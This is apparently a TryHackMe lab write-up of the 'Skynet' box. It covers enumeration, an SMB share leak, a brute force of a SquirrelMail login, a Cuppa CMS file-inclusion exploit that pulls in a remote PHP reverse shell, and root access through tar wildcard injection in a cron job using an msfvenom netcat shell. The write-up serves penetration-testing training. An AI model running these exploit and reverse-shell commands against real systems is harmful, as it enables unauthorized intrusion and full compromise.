Skynet

![11d781669cc190c85022ce575ea9c317.png](eeb7aef3c384436db16db340774c188d.png) ### General Enumeration and Initial Findings (Nmap, FFuF, SMBClient) Starting off, as always, with a basic **nmap** scan ``` nmap -sC -sV -oN initial -T4 10.10.11.92 Nmap scan report for 10.10.11.92 Host is up (0.21s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: TOP SASL UIDL CAPA PIPELINING AUTH-RESP-CODE RESP-CODES 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imap |_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2021-06-06T08:26:40-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-06-06T13:26:40 |_ start_date: N/A ``` A few interesting ports. **80** - Webserver **139** and **445** - SMB. Let's kick around the webserver ![09111542ab5e4fe417eae608bb3d9ce6.png](f67638bd68c64c66be2a24ee89a619d3.png) Search engine that does... nothing? Nothing in the source, no robots.txt. Let's see if we can bust some directories with **FFuF** using the [Seclists Common list](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt) matching all response codes and filtering 404s ``` ffuf -u http://10.10.219.151/FUZZ -w /common.txt -mc all -fc 404 .htaccess [Status: 403, Size: 276, Words: 20, Lines: 10] .htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10] .hta [Status: 403, Size: 276, Words: 20, Lines: 10] admin [Status: 301, Size: 310, Words: 20, Lines: 10] config [Status: 301, Size: 311, Words: 20, Lines: 10] css [Status: 301, Size: 308, Words: 20, Lines: 10] index.html [Status: 200, Size: 523, Words: 26, Lines: 19] js [Status: 301, Size: 307, Words: 20, Lines: 10] server-status [Status: 403, Size: 276, Words: 20, Lines: 10] squirrelmail [Status: 301, Size: 317, Words: 20, Lines: 10] ``` `/admin` and `/config` are **Forbidden** but how about `/squirrelmail`? ![c6db40ceec26c477840099dbd236348f.png](477bf6243c8b4233b5887814edfea106.png) Login page. Let's do some more enumeration before trying to crack this. Since **139 and 445** are open, we'll take a look at some **SMB** enumeration using **smbclient** ``` smbclient -L \\\\10.10.219.151\\ ``` ![498287e0d20d2eea3670b2f90bdeab31.png](6148c1247a63464b941d17f361a458c4.png) Two interesting shares. **anonymous** and **milesdyson** ``` smbclient \\\\10.10.219.151\\anonymous ``` ![009c382c71b90ed99b349d5089e15455.png](a73af5beb865470f9c26a1039748f350.png) Grab **attention.txt** with `get attention.txt` ``` A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson ``` **logs** is a directory with three files, only 1 has data ![0e7c0bef3b482b771c9283cffef5146d.png](8189129d8ce848ab9697ba8f37611165.png) Grab **log1.txt** with `get log1.txt` ``` cyborg007haloterminator terminator22596 terminator219 . . 79terminator6 1996terminator ``` Passwords maybe? Let's go back to `/squirrelmail` and see if any of these work for. We saw that there was a `milesdyson` share, so maybe that's a username? Let's use **FFuF** again, but this time to brute this login form. Capture the login request in burp to build the command. ![a8bfdd866447114bbaef1e6ca0b0787c.png](035d57d03a93402abda27e27968f9071.png) ``` ffuf -u http://10.10.219.151/squirrelmail/src/redirect.php -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt ``` ``` cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1] ``` Got a 302 redirect, which means this is likely our password. Log in! ![df812a90f23950cf03a19de8ebe9add6.png](ab2e7ef8c7fa449c8b429bc6587ff5ef.png) Interesting ![3f1a6fcd298bb004bcc28b3a99c7bf46.png](3de6bf80d5454cc38e06620dbb655844.png) **SMB** password?! Maybe we can access the **milesdyson** share now! ![eded2e8b9d5d4953dc90e4cbc0a79e01.png](f48510b5a6584f9d86cbd38af70f4cf9.png) `cd notes` `ls` ![4def45ee023a5454df8b4cd48478aef8.png](2026bb393c0e450db714388009f11efa.png) Grab **important.txt** with `get important.txt` ``` 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife ``` New endpoint! `/45kra24zxs28v3yd` --- ### Access (Cuppa CMS, Remote File Inclusion, FFuF) ![bc63f6fc92f24bf3d9fedfd0903a63d7.png](719480253e204f42812dae240f028204.png) Running **FFuF** using [Seclists Common list](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt) matching all response codes and filtering 404s ``` .htaccess [Status: 403, Size: 276, Words: 20, Lines: 10] .htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10] .hta [Status: 403, Size: 276, Words: 20, Lines: 10] administrator [Status: 301, Size: 335, Words: 20, Lines: 10] index.html [Status: 200, Size: 418, Words: 45, Lines: 16] ``` `/administrator` **Cuppa cms** ![27be8fa7976ad437e60e0762e3d826d7.png](1c4a6123ca2047bebb0b197bbd94e9c2.png) Looks like there's a LFI/RFI [exploit](https://www.exploit-db.com/exploits/25971) for **Cuppa CMS** ``` http://10.10.11.92/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php ``` Using the PoC to make sure it's vulnerable. Decoded: ``` <?php class Configuration{ public $host = "localhost"; public $db = "cuppa"; public $user = "root"; public $password = "password123"; public $table_prefix = "cu_"; public $administrator_template = "default"; public $list_limit = 25; public $token = "OBqIPqlFWf3X"; public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx"; public $upload_default_path = "media/uploadsFiles"; public $maximum_file_size = "5242880"; public $secure_login = 0; public $secure_login_value = ""; public $secure_login_redirect = ""; } ``` So we have LFI, let's try RFI Using [php-reverse-shell.php]() from pentestmonkey. 1. Edit the relevant values (IP and PORT) 2. Host it on a webserver - `python3 -m http.server` 3. Start a listener - `nc -lvnp 4444` 4. Include your URL - `alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php` 5. Send it! ![b1ce298faa6253cc9b9dd1fc49c1dbbf.png](d87fad90ec774c50b03d71cb2d0c0624.png) --- ### Privesc (tar checkpoints, Wildcard Injection, msfvenom) Password reuse! Using `cyborg007haloterminator` we can switch to the `milesdyson` user. There's an interesting script in `/home/milesdyson/backups` called `backup.sh` ``` milesdyson@skynet:~/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * ``` Let's check if it's running as a **cronjob** ``` cat /etc/crontab # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ``` So every minute it's running the script, which means it's changing to the `/var/www/html` directory and running `tar cf` on everything. `milesdyson` doesn't have write access to `/var/www/html`, but if we drop back down to `www-data` we do! Since **tar** is using a **wildcard** it's vulnerable to injection by creating files with names that represent `tar` checkpoints: ``` --checkpoint=1 --checkpoint-action=exec=sh shell.sh ``` Create a reverse shell using **msfvenom** and start a listener ``` msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R nc -lvnp PORT ``` ``` echo 'SHELLOUTPUT' > shell.sh touch -- "--checkpoint-action=exec=sh shell.sh" touch -- --checkpoint=1 ``` Notice the inclusion of `--` before the file name, this allows us to create filenames with special characters. Now we wait... ![cce8dd0eb08937389abf8fba3541f152.png](690a70cf6d284646a0c796cb9a8f4cf7.png) --- Back to [[TryHackMe Index]] Tags: #thm #tryhackme #box_writeups #cuppa #rfi #smb #wildcard_injection #tar #cron #smbclient #ffuf #bruteforce #msfvenom Related: